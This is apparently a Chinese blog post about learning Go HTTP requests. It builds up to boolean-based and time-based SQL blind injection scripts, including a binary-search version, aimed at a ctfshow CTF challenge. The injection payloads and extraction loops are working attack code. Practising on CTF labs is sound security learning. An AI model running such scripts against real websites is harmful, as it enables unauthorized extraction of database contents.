GO的sql注入盲注脚本
之间学习了go的语法 这里就开始go的爬虫
与其说是爬虫 其实就是网站的访问如何实现 因为之前想通过go写sql注入盲注脚本
发现不是那么简单 这里开始研究一下
首先是请求网站
这里貌似很简单
package main
import (
"fmt"
"net/http"
)
func main() {
res, err := http.Get("https://www.baidu.com/")
fmt.Println(res, err)
}
&{200 OK 200 HTTP/1.1 1 1 map[Content-Type:[application/x-gzip] Date:[Thu, 14 Dec 2023 06:31:16 GMT] Server:[bfe]] 0xc0001a0020 -1 [] false true map[] 0xc000136000 0xc000118370}
发现这里是一个地址 然后就是读取源代码
package main
import (
"fmt"
"io"
"net/http"
"os"
)
func main() {
res, err := http.Get("https://www.baidu.com/")
if err != nil {
fmt.Println("connnect error")
os.Exit(0)
}
body, err := io.ReadAll(res.Body)
// fmt.Println(body)
fmt.Println(string(body))
}
这里再难一点
package main
import (
"fmt"
"io"
"net/http"
"os"
)
func main() {
var url string = "http://www.baidu.com/"
download(url)
}
func download(url string) {
client := &http.Client{} //这里是将 client作为http.clinet的结构体4
res, _ := http.NewRequest("GET", url, nil)
res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)") //设置hander
resp, err := client.Do(res)
if err != nil {
fmt.Println("connect error")
os.Exit(0)
}
defer resp.Body.Close() //取消链接 这里入栈 即 最后进行取消
links, err := io.ReadAll(resp.Body)
fmt.Println(string(links))
}
通过函数 然后发送请求
package main
import (
"fmt"
"io"
"net/http"
"os"
"strings"
)
func main() {
var url string = "http://www.baidu.com/"
download(url)
}
func download(url string) {
client := &http.Client{} //这里是将 client作为http.clinet的结构体4
res, _ := http.NewRequest("GET", url, nil)
res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)") //设置hander
resp, err := client.Do(res)
if err != nil {
fmt.Println("connect error")
os.Exit(0)
}
defer resp.Body.Close() //取消链接 这里入栈 即 最后进行取消
links, err := io.ReadAll(resp.Body)
// fmt.Println(string(links))
if strings.Contains(string(links), "百度一下") {
fmt.Println("存在")
} else {
fmt.Println("不存在")
}
}
然后这里开始尝试写一下盲注脚本
这里开始是bool脚本 题目是ctfshow 174
golang bool注入普通脚本
package main
import (
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
)
var payload string = "1' and (ascii(substr((select database()),%v,1))=%v)-- +"
var flag string
func main() {
var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="
sqlin(url)
}
func sqlin(url1 string) {
for i := 1; i < 200; i++ {
for j := 0; j < 127; j++ {
if j >= 50 {
payload1 := fmt.Sprintf(payload, i, j)
// fmt.Println(payload1)
payload2 := url.QueryEscape(payload1)
payload1 = url1 + payload2
// fmt.Println(payload1)
re := send(payload1)
if check(re) {
flag += string(j)
fmt.Println(flag)
}
}
}
}
}
func send(url string) string {
client := &http.Client{}
res, _ := http.NewRequest("GET", url, nil)
res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
resq, err := client.Do(res)
if err != nil {
fmt.Println("connect error")
os.Exit(0)
}
defer resq.Body.Close()
rest, err := io.ReadAll(resq.Body)
res1 := string(rest)
return res1
}
func check(test string) bool {
if strings.Contains(test, "admin") {
return true
} else {
return false
}
}
很慢哦
二分法看看如何实现
golang bool注入二分法脚本
package main
import (
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
)
var payload string = "1' and (ascii(substr((select database()),%v,1))>%v)-- +"
var flag string
func main() {
var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="
sqlin(url)
}
func sqlin(url1 string) {
for i := 1; i < 200; i++ {
high := 127
low := 37
mid := (high + low) / 2
// fmt.Println(mid)
for high > low {
payload1 := fmt.Sprintf(payload, i, mid)
// fmt.Println(payload1)
payload2 := url.QueryEscape(payload1)
payload1 = url1 + payload2
// fmt.Println(payload1)
re := send(payload1)
if check(re) {
low = mid + 1
} else {
high = mid
}
// fmt.Println(low, high)
mid = (high + low) / 2
if string(mid) == "%" {
os.Exit(0)
}
}
flag += string(mid)
fmt.Println(flag)
}
}
func send(url string) string {
client := &http.Client{}
res, _ := http.NewRequest("GET", url, nil)
res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
resq, err := client.Do(res)
if err != nil {
fmt.Println("connect error")
os.Exit(0)
}
defer resq.Body.Close()
rest, err := io.ReadAll(resq.Body)
res1 := string(rest)
return res1
}
func check(test string) bool {
if strings.Contains(test, "admin") {
return true
} else {
return false
}
}
能发现其实其他都是差不多的 只是修改了
if check(re) {
low = mid + 1
} else {
high = mid
}
// fmt.Println(low, high)
mid = (high + low) / 2
if string(mid) == "%" {
os.Exit(0)
}
这一块 速度又起来了
下面想尝试一下时间注入
golang time注入二分法脚本
package main
import (
"fmt"
"io"
"net/http"
"net/url"
"os"
"time"
)
var payload string = "1' and if((ascii(substr((select database()),%v,1))>%v),sleep(5),0)-- +"
var flag string
func main() {
var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="
sqlin(url)
}
func sqlin(url1 string) {
for i := 1; i < 200; i++ {
high := 127
low := 37
mid := (high + low) / 2
// fmt.Println(mid)
for high > low {
payload1 := fmt.Sprintf(payload, i, mid)
fmt.Println(payload1)
payload2 := url.QueryEscape(payload1)
payload1 = url1 + payload2
// fmt.Println(payload1)
_, int123 := send(payload1)
if check(int123) {
low = mid + 1
} else {
high = mid
}
// fmt.Println(low, high)
mid = (high + low) / 2
if string(mid) == "%" {
os.Exit(0)
}
}
flag += string(mid)
fmt.Println(flag)
}
}
func send(url string) (string, int64) {
client := &http.Client{}
res, _ := http.NewRequest("GET", url, nil)
res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
start := time.Now()
resq, err := client.Do(res)
if err != nil {
fmt.Println("connect error")
os.Exit(0)
}
defer resq.Body.Close()
elapsed := time.Since(start).Milliseconds()
rest, err := io.ReadAll(resq.Body)
res1 := string(rest)
return res1, elapsed
}
func check(test int64) bool {
if test > 5000 {
return true
} else {
return false
}
}
这里是sql注入time的二分法但是我想进行优化
